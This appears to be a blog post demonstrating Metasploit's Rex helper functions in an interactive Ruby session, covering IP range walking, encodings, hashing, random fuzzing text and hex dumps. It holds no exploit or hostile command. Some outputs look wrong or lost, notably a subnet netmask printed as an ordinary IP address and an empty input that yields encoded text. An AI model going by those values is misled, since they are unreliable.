Rex::Socket.addr_ntoa("\001\002\003\004")
=> "1.2.3.4"

>> Rex::Socket.bit2netmask(18)
=> "255.255.192.0"


...Invaluable:
>> Rex::Socket.cidr_crack("192.168.3.0/25")
=> ["192.168.3.0", "192.168.3.127"]


IP validation
>> Rex::Socket.dotted_ip?("1.2.3.4")
=> true
>> Rex::Socket.dotted_ip?("1.2.3.4.")
=> false


DNS Resolution
>> Rex::Socket.resolv_to_dotted("www.google.com")
=> "208.67.216.231"


sockaddr Structs
>> Rex::Socket.to_sockaddr("208.67.216.231","80")
=> "\020\002\000P\320C\330\347\000\000\000\000\000\000\000\000"

Again, Invaluable - Walking IP ranges
> rw=Rex::Socket::RangeWalker.new("192.168.1.1-192.168.2.2")
=> #
>> rw.next_ip
=> "192.168.1.1"
>> rw.next_ip
=> "192.168.1.2"
>> rw.next_ip
=> "192.168.1.3"

Subnet Walking
sw=Rex::Socket::SubnetWalker.new("192.168.1.0","20")
=> #
>> sw.netmask
=> "208.69.36.132"
>> sw.next_ip
=> "192.168.1.0"


Back to Text Conversion:
>> Rex::Text::compress("dfgdf dfgdfg ddddd")
=> "dfgdf dfgdfg ddddd"


Base-64 in/out:
>> Rex::Text::encode_base64("hello world",":::")
=> "aGVsbG8gd29ybGQ=:::"
>> Rex::Text::decode_base64("aGVsbG8gd29ybGQ=")
=> "hello world"


Gzip:
>> Rex::Text::gzip("hello world")
=> "\037\213\b\000\251\342\001J\002\003\313H\315\311\311W(\317/\312I\001\000\205\021J\r\v\000\000\000"


Awesome:
>> Rex::Text::hex_to_raw('\x20\x2e\x2f')
=> " ./"

>> Rex::Text::hexify("Metasploit rocks!Metasploit rocks!Metasploit rocks!")
=> "\\x4d\\x65\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x20\\x72\\x6f\\x63\\x6b\n\\x73\\x21\\x4d\\x65\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x20\\x72\\x6f\n\\x63\\x6b\\x73\\x21\\x4d\\x65\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x20\n\\x72\\x6f\\x63\\x6b\\x73\\x21\n"


>> Rex::Text::html_encode("http://www.google.com?ggg&4=4")
=> "&#x68&#x74&#x74&#x70&#x3a&
#x2f&#x2f&#x77&#x77&#x77&#x2e&
#x67&#x6f&#x6f&#x67&#x6c&#x65&
#x2e&#x63&#x6f&#x6d&#x3f&#x67&
#x67&#x67&#x26&#x34&#x3d&#x34"



Useful:
>> Rex::Text::md5("hello world!+")
=> "7eae149fd806efc3f80c44223205daeb"
>> Rex::Text::md5_raw("hello world!+")
=> "~\256\024\237\330\006\357\303\370\fD\"2\005\332\353"



>> Rex::Text::rand_base(20,'',"A")
=> "AAAAAAAAAAAAAAAAAAAA"


>> Rex::Text::rand_hostname
=> "rycc.bcn8y.n.f.moyn0oq9.org"

For fuzzing:
> Rex::Text::rand_text(40,'-')
=> "\025\263\022v\340o\3334\253EV.5\335KM[\204s(\362\371V\223\341\343Y\232\025P*\260\225l\e\223\317\342\314\275"


For network dumps:
>> Rex::Text::to_hex_dump("hello World\n")
=> "68 65 6c 6c 6f 20 57 6f 72 6c 64 0a hello World.\n\n"

>> Rex::Text::to_unescape("")
=> "%u673c%u6767%u413e"



>> Rex::Text::to_unicode("hello")
=> "h\000e\000l\000l\000o\000"

This is a nice framework to build testing and automated security and QA solutions around. I will revisit MSF Core API in the next post.